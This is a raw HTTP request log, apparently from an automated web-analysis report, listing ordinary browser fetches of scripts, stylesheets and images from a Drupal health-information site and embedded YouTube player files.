                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/drupal.bootstrap.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/attributes.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/theme.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /modules/webform/js/webform.behaviors.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /s/player/59b252b9/www-player.css HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=X1ona4g8SHEcookie: VISITOR_INFO1_LIVE=KOw3SU8QT4Qcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOw%3D%3Dcookie: __Secure-ROLLOUT_TOKEN=CKud1P3Cn6KvrAEQt4fm56y3jQMYt4fm56y3jQM%3Dpriority: u=0
                                  Source: global trafficHTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/embed.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/misc/states.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /modules/webform/js/webform.states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /s/player/59b252b9/www-embed-player.vflset/www-embed-player.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/popover.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/tooltip.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/displace.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/jquery.tabbable.shim.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/position.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/modal.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/dialog.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/base.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/dialog/dialog.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/dialog/dialog.position.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/dialog/dialog.ajax.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/misc/dialog.ajax.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /libraries/json2/json2.js?v=2 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /modules/views_slideshow/js/views_slideshow.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/remote.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3D
